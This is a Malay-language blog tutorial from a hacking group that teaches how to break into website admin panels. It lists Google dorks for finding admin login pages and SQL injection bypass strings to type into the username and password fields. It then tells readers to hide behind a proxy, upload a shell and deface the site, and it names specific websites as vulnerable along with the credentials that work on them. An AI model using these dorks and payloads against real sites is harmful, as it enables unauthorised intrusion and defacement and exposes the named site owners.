Godam |Tutor - By Pass Admin Panel

By pass method digunakan untuk login sesebuah admin panel untuk sesebuah website,cara ini dilakukan dahulu sebelum menggunakan teknik SQLi.Cara ini dilakukan dengan mencari admin panel menggunakan dork-dork yang ada dibawah,dan pada username dan password kita masukkan by pass code untuk mengelirukan system login website tersebut.Tetapi teknik ini sukar digunakan kerana hanya website yang mempunyai vulnerabilty yang tinggi akan berjaya menggunakan teknik ini.

Cara-caranya:

1-copy salah satu dork dibawah,kemudian paste di kotak Google search,dan tekan enter

inurl:adminlogin.asp

inurl:admin_login.asp

inurl:adminlogon.asp

inurl:admin_logon.asp

inurl:\\admin/admin_login.php

inurl:/admin.asp

inurl:/login.asp

inurl:/logon.asp

inurl:/adminlogin.asp

inurl:/adminlogon.asp

inurl:/admin_login.asp

inurl:/admin_logon.asp

inurl:/admin/admin.asp

inurl:/admin/login.asp

inurl:/admin/logon.asp

inurl:/admin/adminlogin.asp

inurl:/admin/adminlogon.asp

inurl:/admin/admin_login.asp

inurl:/admin/admin_logon.asp

inurl:/administrator/admin.asp

inurl:/administrator/login.asp

inurl:/administrator/logon.asp

inurl:root/login.asp

inurl:admin/index.asp

2-kemudian klik salah satu result,akan keluar admin panel untuk website,dan masukkan salah satu code di bawah di kotak username dan password,kemudian enter.Jika web tersebut adalah vuln,anda akan masuk kedalam admin panel sebagai admin haram =P.Ingat,untuk melakukan ini perlulah secara anonymous,guna proxy untuk hide Ip adress anda.

admin'--

1'or'1'='1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

1' OR '1'='1

3-Setelah login sebagai admin,cari upload tool or directory untuk upload shell kemudian bolehlah deface untuk tinggalkan mesej anda.Jika tertangkap anda tanggung sendiri pihak GodamArmy tidak bertanggungjawab =)

Contoh website yang vuln:

http://shopping.richardhealey.com/

http://www.amskrupajal.org/AdminLogin.asp

admin = 1'or'1'='1 pass = 1'or'1'='1

http://www.alertfx.com/admin/admin.asp

admin = 1'or'1'='1 pass = 1'or'1'='1.................

Pages

Godam |Tutor - By Pass Admin Panel

0 comments:

Post a Comment

OPs

OPs

Video

Popular Posts

Godam Catagory

Your Location


	Bantah Seksyen 114A Hari Internet Blackout, 14 Ogos 2012 Ketahui lebih lanjut bagaimana pindaan ini boleh mengancam kebebasan berinternet di Malaysia. Juga boleh baca disini Sokong：Satu Juta Ratyat Malaysia Bantahan Seksyen 114A Share on Facebook Oleh: Centre for Independent Journalism (CIJ)


	Bantah Seksyen 114A Hari Internet Blackout, 14 Ogos 2012 Ketahui lebih lanjut bagaimana pindaan ini boleh mengancam kebebasan berinternet di Malaysia. Juga boleh baca disini Sokong：Satu Juta Ratyat Malaysia Bantahan Seksyen 114A Share on Facebook Oleh: Centre for Independent Journalism (CIJ)